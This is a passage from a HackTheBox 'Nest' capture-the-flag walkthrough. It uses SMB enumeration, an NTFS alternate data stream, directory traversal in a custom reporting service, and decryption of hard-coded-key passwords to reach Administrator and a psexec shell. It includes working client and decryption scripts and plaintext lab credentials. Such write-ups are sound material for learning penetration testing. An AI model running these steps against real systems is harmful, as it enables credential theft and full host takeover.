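	// PKCS#7: the last byte is the pad length and every pad byte must equal it.
	pad := int(pt[len(pt)-1])
	if pad == 0 || pad > aes.BlockSize {
		return "", errors.New("bad padding")
	}
	if !bytes.Equal(pt[len(pt)-pad:], bytes.Repeat([]byte{byte(pad)}, pad)) {
		return "", errors.New("bad padding")
	}
	return string(pt[:len(pt)-pad]), nil
}

// DecryptRUConfigPassword applies the constants hard-coded in Utils.DecryptString.
func DecryptRUConfigPassword(cipherB64 string) (string, error) {
	return HqkDecrypt(cipherB64, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
}

func main() {
	// Ciphertext taken from the RU_config.xml shown above.
	pw, err := DecryptRUConfigPassword("fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=")
	if err != nil {
		fmt.Println("error:", err)
		return
	}
	fmt.Println(pw)
}
```

`go run` prints the same value the dotnet run above produced. Because HqkDecrypt takes the parameters as arguments rather than baking them in, the same function serves for any other configuration value protected with this scheme once its constants are known.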

Check shares available with user c.smith

The credentials are accepted and the same three shares (Data, Secure$ and Users) are readable.

u505@naos:~/HTB/Machines/Nest/mnt/secure/IT/Carl$ smbmap -u c.smith -p xRxRxPANCAK3SxRxRx -H 10.10.10.178
[+] IP: 10.10.10.178:445        Name: nest
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        Data                                                    READ ONLY
        IPC$                                                    NO ACCESS       Remote IPC
        Secure$                                                 READ ONLY
        Users                                                   READ ONLY

crackmapexec confirms it too.

u505@naos:~/HTB/Machines/Nest/mnt/secure/IT/Carl$ sudo crackmapexec smb 10.10.10.178/32 -u c.smith -p xRxRxPANCAK3SxRxRx --shares
[sudo] password for u505:
SMB         10.10.10.178    445    HTB-NEST         [*] Windows 6.1 Build 7601 (name:HTB-NEST) (domain:HTB-NEST) (signing:False) (SMBv1:False)
SMB         10.10.10.178    445    HTB-NEST         [+] HTB-NEST\c.smith:xRxRxPANCAK3SxRxRx
SMB         10.10.10.178    445    HTB-NEST         [+] Enumerated shares
SMB         10.10.10.178    445    HTB-NEST         Share           Permissions     Remark
SMB         10.10.10.178    445    HTB-NEST         -----           -----------     ------
SMB         10.10.10.178    445    HTB-NEST         ADMIN$                          Remote Admin
SMB         10.10.10.178    445    HTB-NEST         C$                              Default share
SMB         10.10.10.178    445    HTB-NEST         Data            READ
SMB         10.10.10.178    445    HTB-NEST         IPC$                            Remote IPC
SMB         10.10.10.178    445    HTB-NEST         Secure$         READ
SMB         10.10.10.178    445    HTB-NEST         Users           READ

Files enumeration

Mount shares as c.smith

u505@naos:~/HTB/Machines/Nest/mnt/secure/IT/Carl$ cd ..
u505@naos:~/HTB/Machines/Nest/mnt/secure/IT$ cd ..
u505@naos:~/HTB/Machines/Nest/mnt/secure$ cd ..
u505@naos:~/HTB/Machines/Nest/mnt$ sudo umount data secure users
u505@naos:~/HTB/Machines/Nest/mnt$ sudo mount -t cifs //10.10.10.178/data data -o "username=c.smith,password=xRxRxPANCAK3SxRxRx"
u505@naos:~/HTB/Machines/Nest/mnt$ sudo mount -t cifs //10.10.10.178/users users -o "username=c.smith,password=xRxRxPANCAK3SxRxRx"
u505@naos:~/HTB/Machines/Nest/mnt$ sudo mount -t cifs //10.10.10.178/secure$ secure -o "username=c.smith,password=xRxRxPANCAK3SxRxRx"

Check files available

u505@naos:~/HTB/Machines/Nest/mnt$ find . -type f -exec ls -l {} \;
find: ‘./secure/Finance’: Permission denied
find: ‘./secure/HR’: Permission denied
find: ‘./secure/IT’: Permission denied
-rwxr-xr-x 1 root root 246 Aug  3  2019 ./data/IT/Configs/Adobe/editing.xml
-rwxr-xr-x 1 root root 0 Oct 10  2011 ./data/IT/Configs/Adobe/Options.txt
-rwxr-xr-x 1 root root 258 Jan  8  2013 ./data/IT/Configs/Adobe/projects.xml
-rwxr-xr-x 1 root root 1274 Aug  7  2019 ./data/IT/Configs/Adobe/settings.xml
-rwxr-xr-x 1 root root 1369 Jun 11  2003 ./data/IT/Configs/Atlas/Temp.XML
-rwxr-xr-x 1 root root 4598 Mar  3  2012 ./data/IT/Configs/Microsoft/Options.xml
-rwxr-xr-x 1 root root 6451 Aug  7  2019 ./data/IT/Configs/NotepadPlusPlus/config.xml
-rwxr-xr-x 1 root root 2108 Aug  7  2019 ./data/IT/Configs/NotepadPlusPlus/shortcuts.xml
-rwxr-xr-x 1 root root 270 Aug  8  2019 './data/IT/Configs/RU Scanner/RU_config.xml'
-rwxr-xr-x 1 root root 48 Aug  5  2019 './data/Shared/Maintenance/Maintenance Alerts.txt'
-rwxr-xr-x 1 root root 425 Aug  7  2019 './data/Shared/Templates/HR/Welcome Email.txt'
find: ‘./users/Administrator’: Permission denied
-rwxr-xr-x 1 root root 17408 Aug  7  2019 './users/C.Smith/HQK Reporting/AD Integration Module/HqkLdap.exe'
-rwxr-xr-x 1 root root 0 Aug  8  2019 './users/C.Smith/HQK Reporting/Debug Mode Password.txt'
-rwxr-xr-x 1 root root 249 Aug  8  2019 './users/C.Smith/HQK Reporting/HQK_Config_Backup.xml'
-rwxr-xr-x 1 root root 32 Aug  8  2019 ./users/C.Smith/user.txt
find: ‘./users/L.Frost’: Permission denied
find: ‘./users/R.Thompson’: Permission denied
find: ‘./users/TempUser’: Permission denied

User flag

u505@naos:~/HTB/Machines/Nest/mnt$ cat ./users/C.Smith/user.txt
<USER_FLAG>

Other important files

There is an executable file; it is a .NET assembly.

u505@naos:~/HTB/Machines/Nest/mnt$ file './users/C.Smith/HQK Reporting/AD Integration Module/HqkLdap.exe'
./users/C.Smith/HQK Reporting/AD Integration Module/HqkLdap.exe: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows

HQK Reporting is related to the service found on port 4386: the backup configuration names the same port.

u505@naos:~/HTB/Machines/Nest/mnt$ cat './users/C.Smith/HQK Reporting/HQK_Config_Backup.xml'
<?xml version="1.0"?>
<ServiceSettings xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <Port>4386</Port>
  <QueryDirectory>C:\Program Files\HQK\ALL QUERIES</QueryDirectory>
</ServiceSettings>

The last file, Debug Mode Password.txt, appears to be empty (0 bytes).

u505@naos:~/HTB/Machines/Nest/mnt$ ls -l './users/C.Smith/HQK Reporting/Debug Mode Password.txt'
-rwxr-xr-x 1 root root 0 Aug  8  2019 './users/C.Smith/HQK Reporting/Debug Mode Password.txt'

But inspecting it with smbclient, an NTFS Alternate Data Stream (ADS) appears.

u505@naos:~/HTB/Machines/Nest$ smbclient \\\\10.10.10.178\\Users -U c.Smith
Enter WORKGROUP\c.Smith's password:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sat Jan 25 18:04:21 2020
  ..                                  D        0  Sat Jan 25 18:04:21 2020
  Administrator                       D        0  Fri Aug  9 11:08:23 2019
  C.Smith                             D        0  Sun Jan 26 02:21:44 2020
  L.Frost                             D        0  Thu Aug  8 13:03:01 2019
  R.Thompson                          D        0  Thu Aug  8 13:02:50 2019
  TempUser                            D        0  Wed Aug  7 18:55:56 2019

		10485247 blocks of size 4096. 6545619 blocks available
smb: \> cd C.Smith
smb: \C.Smith\> cd "HQK Reporting"
smb: \C.Smith\HQK Reporting\> dir
  .                                   D        0  Thu Aug  8 19:06:17 2019
  ..                                  D        0  Thu Aug  8 19:06:17 2019
  AD Integration Module               D        0  Fri Aug  9 08:18:42 2019
  Debug Mode Password.txt             A        0  Thu Aug  8 19:08:17 2019
  HQK_Config_Backup.xml               A      249  Thu Aug  8 19:09:05 2019

		10485247 blocks of size 4096. 6545619 blocks available
smb: \C.Smith\HQK Reporting\> allinfo "Debug Mode Password.txt"
altname: DEBUGM~1.TXT
create_time:    Thu Aug  8 07:06:12 PM 2019 EDT
access_time:    Thu Aug  8 07:06:12 PM 2019 EDT
write_time:     Thu Aug  8 07:08:17 PM 2019 EDT
change_time:    Thu Aug  8 07:08:17 PM 2019 EDT
attributes: A (20)
stream: [::$DATA], 0 bytes
stream: [:Password:$DATA], 15 bytes
smb: \C.Smith\HQK Reporting\> get "Debug Mode Password.txt:Password"
getting file \C.Smith\HQK Reporting\Debug Mode Password.txt:Password of size 15 as Debug Mode Password.txt:Password (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \C.Smith\HQK Reporting\> quit

The Debug password was hidden in the ADS.

u505@naos:~/HTB/Machines/Nest$ cat "Debug Mode Password.txt:Password"
WBQ201953D8w
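Spotting a named stream by eye works for one file; on a share with hundreds of files you want the check automated. The script below is an added example for this writeup (not part of the page or of smbclient): it parses the text that smbclient's allinfo prints, separates the default unnamed ::$DATA stream from any named stream, and builds the path to hand to get. The allinfo text embedded in it is constructed to mirror the block above.

```python
"""Flag alternate data streams (ADS) in smbclient `allinfo` output.

Added example for this writeup, not code from the page or from smbclient.
Every NTFS file has one unnamed stream, which smbclient reports as
"::$DATA"; any further "name:$DATA" stream is an ADS that a plain `ls` on
a Linux CIFS mount does not show. SAMPLE_ALLINFO below is constructed to
mirror the writeup's allinfo block.
"""
import re
from typing import NamedTuple

# One "stream: [<name>], <size> bytes" line per stream, as printed by allinfo.
STREAM_RE = re.compile(r"^stream:\s*\[(?P<name>[^\]]*)\],\s*(?P<size>\d+)\s+bytes", re.M)


class Stream(NamedTuple):
    name: str   # "" for the default unnamed stream
    size: int


def parse_streams(allinfo_text: str) -> list[Stream]:
    """Return every $DATA stream listed in one allinfo block."""
    streams = []
    for m in STREAM_RE.finditer(allinfo_text):
        raw = m.group("name")          # "::$DATA" or ":Password:$DATA"
        parts = raw.split(":")         # ["", "", "$DATA"] / ["", "Password", "$DATA"]
        if len(parts) != 3 or parts[2] != "$DATA":
            continue                   # skip anything that is not a data stream
        streams.append(Stream(parts[1], int(m.group("size"))))
    return streams


def alternate_streams(allinfo_text: str) -> list[Stream]:
    """Only the named streams, i.e. the ones the CIFS mount hid from ls."""
    return [s for s in parse_streams(allinfo_text) if s.name]


def smbclient_get_path(share_path: str, stream: Stream) -> str:
    """Path to pass to smbclient's `get` to download a named stream."""
    return f"{share_path}:{stream.name}"


# Constructed sample, modelled on the allinfo output in the writeup.
SAMPLE_ALLINFO = """\
altname: DEBUGM~1.TXT
create_time:    Thu Aug  8 07:06:12 PM 2019 EDT
access_time:    Thu Aug  8 07:06:12 PM 2019 EDT
write_time:     Thu Aug  8 07:08:17 PM 2019 EDT
change_time:    Thu Aug  8 07:08:17 PM 2019 EDT
attributes: A (20)
stream: [::$DATA], 0 bytes
stream: [:Password:$DATA], 15 bytes
"""

if __name__ == "__main__":
    for s in alternate_streams(SAMPLE_ALLINFO):
        path = smbclient_get_path("Debug Mode Password.txt", s)
        print(f'ADS found: {s.name!r} ({s.size} bytes) -> get "{path}"')
```

Feed it the allinfo output of each file in a share (for example from a scripted smbclient -c 'recurse; ...' run) and any file that yields a non-empty list deserves a closer look; a 0-byte file with a named stream, as here, is the classic pattern.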

Root flag

Disassemble HqkLdap.exe

With dnSpy we can decompile the assembly's Intermediate Language (IL) back to readable source. I used a Windows box to run dnSpy.

There is a function DS that decrypts a string by calling the function RD with a fixed set of parameters.

Nest04.png

The function RD is identical to the decryption routine found earlier in this writeup, but this time the parameters have changed:

* PassPhrase: 667912
* Salt: 1313Rf99
* Password iterations: 3
* Init vector: 1L1SA61493DRV53Z
* Key length: still 256 bits

Because the passphrase, salt, IV and iteration count are all hard-coded in the assembly, anyone who can read the executable can derive the key and decrypt every value it protects; the encryption adds obscurity, not secrecy.

Nest05.png

Service on port 4386

After playing with the service, we discover that the command LIST lists the current directory, SETDIR changes the current directory (and accepts .., so it is not confined to the configured query directory), and, once debug mode is enabled with the password recovered above, the additional command SHOWQUERY prints the content of a file.

u505@naos:~/HTB/Machines/Nest$ telnet nest 4386
Trying 10.10.10.178...
Connected to nest.
Escape character is '^]'.

HQK Reporting Service V1.2
>help
This service allows users to run queries against databases using the legacy HQK format
--- AVAILABLE COMMANDS ---
LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
>list
Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command
QUERY FILES IN CURRENT DIRECTORY
[DIR]  COMPARISONS
[1]   Invoices (Ordered By Customer)
[2]   Products Sold (Ordered By Customer)
[3]   Products Sold In Last 30 Days
Current Directory: ALL QUERIES
>setdir ..
Current directory set to HQK
>list
Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command
QUERY FILES IN CURRENT DIRECTORY
[DIR]  ALL QUERIES
[DIR]  LDAP
[DIR]  Logs
[1]   HqkSvc.exe
[2]   HqkSvc.InstallState
[3]   HQK_Config.xml
Current Directory: HQK
>debug WBQ201953D8w
Debug mode enabled. Use the HELP command to view additional commands that are now available
>help
This service allows users to run queries against databases using the legacy HQK format
--- AVAILABLE COMMANDS ---
LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
SERVICE
SESSION
SHOWQUERY <Query_ID>
>setdir ldap
Current directory set to ldap
>list
Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command
QUERY FILES IN CURRENT DIRECTORY
[1]   HqkLdap.exe
[2]   Ldap.conf
Current Directory: ldap
>showquery 2
Domain=nest.local
Port=389
BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local
User=Administrator
Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=
>quit
Was it something I said?
Connection closed by foreign host.

In the LDAP directory we find the same executable that we disassembled before, together with the LDAP configuration (Ldap.conf), which holds the Administrator's encrypted password and is readable through SHOWQUERY once debug mode is on.
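The interaction above is easy to script, since the protocol is just a line-based prompt. The client below is an added example for this writeup, not the service's own code: it reads until the ">" prompt, parses LIST output into directories and query IDs, and chains SETDIR .., DEBUG, SETDIR and SHOWQUERY to pull Ldap.conf. FakeHqkServer is a constructed stand-in whose replies are modelled on the transcript so the code runs offline; against the real box you would pass socket.create_connection((host, 4386)) as the transport.

```python
"""Client for the HQK Reporting Service protocol (port 4386) as observed in
this writeup. Added example, not the service's own code.

Observed protocol: a banner, then a ">" prompt; one command per line; each
reply is free text ending at the next ">" prompt. LIST entries look like
"[DIR] name" or "[n] name". FakeHqkServer replays constructed replies that
mirror the transcript; a real socket (sendall/recv) works as the transport.
"""
import re

PROMPT = b">"
LIST_ENTRY = re.compile(r"^\[(DIR|\d+)\]\s+(.+?)\s*$", re.M)


class HqkClient:
    def __init__(self, transport):
        self.t = transport  # anything with sendall()/recv(), e.g. a socket
        self.banner = self._read_until_prompt()

    def _read_until_prompt(self) -> str:
        buf = b""
        while not buf.rstrip().endswith(PROMPT):
            chunk = self.t.recv(4096)
            if not chunk:  # connection closed before a prompt arrived
                break
            buf += chunk
        return buf.decode(errors="replace").rstrip().removesuffix(">").strip()

    def cmd(self, line: str) -> str:
        self.t.sendall(line.encode() + b"\r\n")
        return self._read_until_prompt()

    def list_dir(self):
        """LIST -> (subdirectory names, {query_id: file name})."""
        dirs, queries = [], {}
        for kind, name in LIST_ENTRY.findall(self.cmd("LIST")):
            if kind == "DIR":
                dirs.append(name)
            else:
                queries[int(kind)] = name
        return dirs, queries

    def debug(self, password: str) -> bool:
        return "Debug mode enabled" in self.cmd(f"DEBUG {password}")

    def show_query(self, query_id: int) -> str:
        return self.cmd(f"SHOWQUERY {query_id}")


def parse_kv(text: str) -> dict:
    """Key=Value lines as in Ldap.conf; split on the first '=' only so values
    like 'OU=...,DC=...' and base64 with a trailing '=' stay intact."""
    return dict(line.split("=", 1) for line in text.splitlines() if "=" in line)


def dump_ldap_conf(client: HqkClient, debug_password: str) -> dict:
    """The traversal from the writeup: SETDIR .. escapes the query directory,
    DEBUG unlocks SHOWQUERY, SHOWQUERY returns Ldap.conf as plain text."""
    client.cmd("SETDIR ..")
    dirs, _ = client.list_dir()
    ldap_dir = next(d for d in dirs if d.lower() == "ldap")
    if not client.debug(debug_password):
        raise RuntimeError("debug password rejected")
    client.cmd(f"SETDIR {ldap_dir}")
    _, queries = client.list_dir()
    conf_id = next(i for i, n in queries.items() if n.lower() == "ldap.conf")
    return parse_kv(client.show_query(conf_id))


class FakeHqkServer:
    """Constructed stand-in with the directory layout seen in the transcript."""
    LISTINGS = {
        "ALL QUERIES": "[DIR]  COMPARISONS\n[1]   Invoices (Ordered By Customer)\n"
                       "[2]   Products Sold (Ordered By Customer)\n[3]   Products Sold In Last 30 Days",
        "HQK": "[DIR]  ALL QUERIES\n[DIR]  LDAP\n[DIR]  Logs\n"
               "[1]   HqkSvc.exe\n[2]   HqkSvc.InstallState\n[3]   HQK_Config.xml",
        "LDAP": "[1]   HqkLdap.exe\n[2]   Ldap.conf",
    }
    LDAP_CONF = ("Domain=nest.local\nPort=389\nBaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local\n"
                 "User=Administrator\nPassword=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=")

    def __init__(self, debug_password: str = "WBQ201953D8w"):
        self.cwd, self.debug_on, self.pw = "ALL QUERIES", False, debug_password
        self.pending = b"HQK Reporting Service V1.2\n>"

    def sendall(self, data: bytes) -> None:
        verb, _, arg = data.decode().strip().partition(" ")
        verb = verb.upper()
        if verb == "LIST":
            reply = f"QUERY FILES IN CURRENT DIRECTORY\n{self.LISTINGS[self.cwd]}\nCurrent Directory: {self.cwd}"
        elif verb == "SETDIR":  # in this stand-in every parent is HQK
            self.cwd = "HQK" if arg == ".." else arg.upper()
            reply = f"Current directory set to {self.cwd}"
        elif verb == "DEBUG":
            self.debug_on = arg == self.pw
            reply = "Debug mode enabled." if self.debug_on else "Bad password (constructed reply)"
        elif verb == "SHOWQUERY" and self.debug_on and self.cwd == "LDAP" and arg == "2":
            reply = self.LDAP_CONF
        else:
            reply = "Unknown command (constructed reply)"
        self.pending = (reply + "\n>").encode()

    def recv(self, n: int) -> bytes:
        out, self.pending = self.pending[:n], self.pending[n:]
        return out


if __name__ == "__main__":
    conf = dump_ldap_conf(HqkClient(FakeHqkServer()), "WBQ201953D8w")
    print(conf["User"], conf["Password"])
```

Reading until the prompt rather than a fixed number of lines is what makes the client robust against replies of varying length (HELP grows once debug mode is on); everything else is plain string handling.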

Decrypt administrator password

With the help of our previous program, we can decrypt the string: we only need to update the encryption parameters to the ones recovered from HqkLdap.exe and swap in the new ciphertext.

u505@naos:~/HTB/Machines/Nest/VBu505$ cat Program.vb
Imports System
Imports System.Text
Imports System.Security.Cryptography

Public Class Utils

    ' Same parameters as the DS/RD functions decompiled from HqkLdap.exe.
    ' The commented-out call keeps the earlier parameter set for reference.
    Public Shared Function DecryptString(EncryptedString As String) As String
        If String.IsNullOrEmpty(EncryptedString) Then
            Return String.Empty
        Else
            'Return Decrypt(EncryptedString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
            Return Decrypt(EncryptedString, "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256)
        End If
    End Function

    ' PBKDF2 key derivation (Rfc2898DeriveBytes, HMAC-SHA1) followed by AES-CBC decryption.
    Public Shared Function Decrypt(ByVal cipherText As String, _
                                   ByVal passPhrase As String, _
                                   ByVal saltValue As String, _
                                   ByVal passwordIterations As Integer, _
                                   ByVal initVector As String, _
                                   ByVal keySize As Integer) As String

        ' Salt and IV are used as raw ASCII bytes; the ciphertext is base64.
        Dim initVectorBytes As Byte() = Encoding.ASCII.GetBytes(initVector)
        Dim saltValueBytes As Byte() = Encoding.ASCII.GetBytes(saltValue)
        Dim cipherTextBytes As Byte() = Convert.FromBase64String(cipherText)

        ' Derive a keySize-bit key from the pass phrase, salt and iteration count.
        Dim password As New Rfc2898DeriveBytes(passPhrase, saltValueBytes, passwordIterations)
        Dim keyBytes As Byte() = password.GetBytes(CInt(keySize / 8))

        ' AES in CBC mode; the default PKCS#7 padding is stripped by the CryptoStream.
        Dim symmetricKey As New AesCryptoServiceProvider
        symmetricKey.Mode = CipherMode.CBC
        Dim decryptor As ICryptoTransform = symmetricKey.CreateDecryptor(keyBytes, initVectorBytes)

        Dim memoryStream As New IO.MemoryStream(cipherTextBytes)
        Dim cryptoStream As New CryptoStream(memoryStream, decryptor, CryptoStreamMode.Read)

        Dim plainTextBytes As Byte()
        ReDim plainTextBytes(cipherTextBytes.Length)
        Dim decryptedByteCount As Integer = cryptoStream.Read(plainTextBytes, 0, plainTextBytes.Length)

        memoryStream.Close()
        cryptoStream.Close()

        Return Encoding.ASCII.GetString(plainTextBytes, 0, decryptedByteCount)
    End Function

End Class

Module Program
    Sub Main(args As String())
        'Console.WriteLine(Utils.DecryptString("fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE="))
        Console.WriteLine(Utils.DecryptString("yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4="))
    End Sub
End Module

Running the program gives us the cleartext password.

u505@naos:~/HTB/Machines/Nest/VBu505$ dotnet run
XtH4nkS4Pl4y1nGX
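The same decryption can be done without a .NET toolchain. The Python below is an added example for this writeup, not code from the binary or from the page: it reproduces what the decompiled Decrypt() does, PBKDF2-HMAC-SHA1 (the default behind Rfc2898DeriveBytes) to derive the 256-bit key, then AES-256-CBC with the hard-coded IV and PKCS#7 padding. Both parameter sets shown in the VB program are kept as profiles, and an encrypt() inverse is included so a recovered profile can be checked by round-tripping before it is trusted. It assumes the cryptography package is installed (pip install cryptography).

```python
"""Python re-implementation of the Decrypt() routine decompiled from
HqkLdap.exe, so the value can be recovered on Linux. Added example for this
writeup, not code from the binary or the page.

What the VB does, mirrored here: Rfc2898DeriveBytes (PBKDF2-HMAC-SHA1)
derives a 256-bit key from the hard-coded passphrase/salt/iterations, then
AES-CBC with the hard-coded ASCII IV and PKCS#7 padding decrypts the
base64 ciphertext. Requires the `cryptography` package (assumption).
"""
import base64
import hashlib
from dataclasses import dataclass

from cryptography.hazmat.primitives import padding
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes


@dataclass(frozen=True)
class HqkCryptoProfile:
    """One set of hard-coded parameters recovered from a decompiled binary."""
    passphrase: str
    salt: str
    iterations: int
    iv: str
    key_bits: int = 256

    def key(self) -> bytes:
        # .NET Rfc2898DeriveBytes defaults to HMAC-SHA1; salt is ASCII as in the VB.
        return hashlib.pbkdf2_hmac("sha1", self.passphrase.encode("utf-8"),
                                   self.salt.encode("ascii"), self.iterations,
                                   self.key_bits // 8)

    def _cipher(self) -> Cipher:
        return Cipher(algorithms.AES(self.key()), modes.CBC(self.iv.encode("ascii")))

    def decrypt(self, ciphertext_b64: str) -> str:
        if not ciphertext_b64:
            return ""                           # DecryptString's empty-input branch
        dec = self._cipher().decryptor()
        padded = dec.update(base64.b64decode(ciphertext_b64)) + dec.finalize()
        unpad = padding.PKCS7(128).unpadder()   # CryptoStream strips PKCS#7 the same way
        return (unpad.update(padded) + unpad.finalize()).decode("ascii")

    def encrypt(self, plaintext: str) -> str:
        """Inverse of decrypt(); useful to confirm a profile round-trips."""
        pad = padding.PKCS7(128).padder()
        data = pad.update(plaintext.encode("ascii")) + pad.finalize()
        enc = self._cipher().encryptor()
        return base64.b64encode(enc.update(data) + enc.finalize()).decode("ascii")


# Parameters decompiled from HqkLdap.exe (this page) ...
HQKLDAP = HqkCryptoProfile("667912", "1313Rf99", 3, "1L1SA61493DRV53Z")
# ... and the earlier set that the page's VB program keeps commented out.
RU_CONFIG = HqkCryptoProfile("N3st22", "88552299", 2, "464R5DFA5DL6LE28")

# Password= value read from Ldap.conf through SHOWQUERY.
LDAP_CONF_PASSWORD = "yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4="

if __name__ == "__main__":
    print(HQKLDAP.decrypt(LDAP_CONF_PASSWORD))
```

Because key, IV and iteration count are fixed in the binary, the scheme is deterministic: encrypting the recovered plaintext with the same profile reproduces the exact ciphertext from Ldap.conf, which is a quick way to confirm the parameters were transcribed correctly from the decompiler.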

Root flag

With crackmapexec, we can confirm that the password is valid for the Administrator account: the (Pwn3d!) marker means the account has administrative rights on the host, and every share, ADMIN$ and C$ included, is writable.

u505@naos:~/HTB/Machines/Nest/VBu505$ sudo crackmapexec smb 10.10.10.178/32 -u administrator -p XtH4nkS4Pl4y1nGX --shares
SMB         10.10.10.178    445    HTB-NEST         [*] Windows 6.1 Build 7601 (name:HTB-NEST) (domain:HTB-NEST) (signing:False) (SMBv1:False)
SMB         10.10.10.178    445    HTB-NEST         [+] HTB-NEST\administrator:XtH4nkS4Pl4y1nGX (Pwn3d!)
SMB         10.10.10.178    445    HTB-NEST         [+] Enumerated shares
SMB         10.10.10.178    445    HTB-NEST         Share           Permissions     Remark
SMB         10.10.10.178    445    HTB-NEST         -----           -----------     ------
SMB         10.10.10.178    445    HTB-NEST         ADMIN$          READ,WRITE      Remote Admin
SMB         10.10.10.178    445    HTB-NEST         C$              READ,WRITE      Default share
SMB         10.10.10.178    445    HTB-NEST         Data            READ,WRITE
SMB         10.10.10.178    445    HTB-NEST         IPC$                            Remote IPC
SMB         10.10.10.178    445    HTB-NEST         Secure$         READ,WRITE
SMB         10.10.10.178    445    HTB-NEST         Users           READ,WRITE

With Impacket's psexec.py, we can obtain a shell on the machine. The tool uploads a randomly named service binary to the writable ADMIN$ share, creates and starts a service for it through the Service Control Manager, and removes both again on exit; every step is visible in the output below.

u505@naos:~/HTB/Machines/Nest$ python3 /opt/utils/impacket/examples/psexec.py administrator@nest
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Password:
[*] Requesting shares on nest.....
[*] Found writable share ADMIN$
[*] Uploading file BKaLscZa.exe
[*] Opening SVCManager on nest.....
[*] Creating service XuLc on nest.....
[*] Starting service XuLc.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>cd c:\Users\administrator\Desktop

c:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 2C6F-6A14

 Directory of c:\Users\Administrator\Desktop

01/26/2020  07:20 AM    <DIR>          .
01/26/2020  07:20 AM    <DIR>          ..
08/05/2019  10:27 PM                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)  26,811,756,544 bytes free

c:\Users\Administrator\Desktop>type root.txt
<ROOT_FLAG>

C:\Windows\system32>systeminfo

Host Name:                 HTB-NEST
OS Name:                   Microsoft Windows Server 2008 R2 Standard
OS Version:                6.1.7601 Service Pack 1 Build 7601
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:
Product ID:                00477-179-0000007-84361
Original Install Date:     8/5/2019, 9:22:30 PM
System Boot Time:          12/27/2020, 5:15:00 AM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC) Dublin, Edinburgh, Lisbon, London
Total Physical Memory:     2,047 MB
Available Physical Memory: 1,654 MB
Virtual Memory: Max Size:  4,095 MB
Virtual Memory: Available: 3,679 MB
Virtual Memory: In Use:    416 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 68 Hotfix(s) Installed.
                           [01]: KB981391
                           [02]: KB981392
                           [03]: KB977236
                           [04]: KB981111
                           [05]: KB977238
                           [06]: KB977239
                           [07]: KB981390
                           [08]: KB2305420
                           [09]: KB2393802
                           [10]: KB2425227
                           [11]: KB2484033
                           [12]: KB2488113
                           [13]: KB2505438
                           [14]: KB2506014
                           [15]: KB2506212
                           [16]: KB2506928
                           [17]: KB2509553
                           [18]: KB2511250
                           [19]: KB2511455
                           [20]: KB2522422
                           [21]: KB2544893
                           [22]: KB2545698
                           [23]: KB2547666
                           [24]: KB2552343
                           [25]: KB2560656
                           [26]: KB2563227
                           [27]: KB2564958
                           [28]: KB2570947
                           [29]: KB2585542
                           [30]: KB2598845
                           [31]: KB2603229
                           [32]: KB2607047
                           [33]: KB2608658
                           [34]: KB2618451
                           [35]: KB2620704
                           [36]: KB2621440
                           [37]: KB2631813
                           [38]: KB2640148
                           [39]: KB2643719
                           [40]: KB2653956
                           [41]: KB2654428
                           [42]: KB2660075
                           [43]: KB2667402
                           [44]: KB2676562
                           [45]: KB2685811
                           [46]: KB2685813
                           [47]: KB2685939
                           [48]: KB2690533
                           [49]: KB2698365
                           [50]: KB2705219
                           [51]: KB2709630
                           [52]: KB2712808
                           [53]: KB2718704
                           [54]: KB2726535
                           [55]: KB2729094
                           [56]: KB2741355
                           [57]: KB2758857
                           [58]: KB2761217
                           [59]: KB2765809
                           [60]: KB2770660
                           [61]: KB2791765
                           [62]: KB2807986
                           [63]: KB2813347
                           [64]: KB2840149
                           [65]: KB4012212
                           [66]: KB958488
                           [67]: KB976902
                           [68]: KB976932
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.178
                                 [02]: fe80::9da7:5b52:920d:5876
                                 [03]: dead:beef::9da7:5b52:920d:5876

c:\Users\Administrator\Desktop>exit
[*] Process cmd.exe finished with ErrorCode: 0, ReturnCode: 0
[*] Opening SVCManager on nest.....
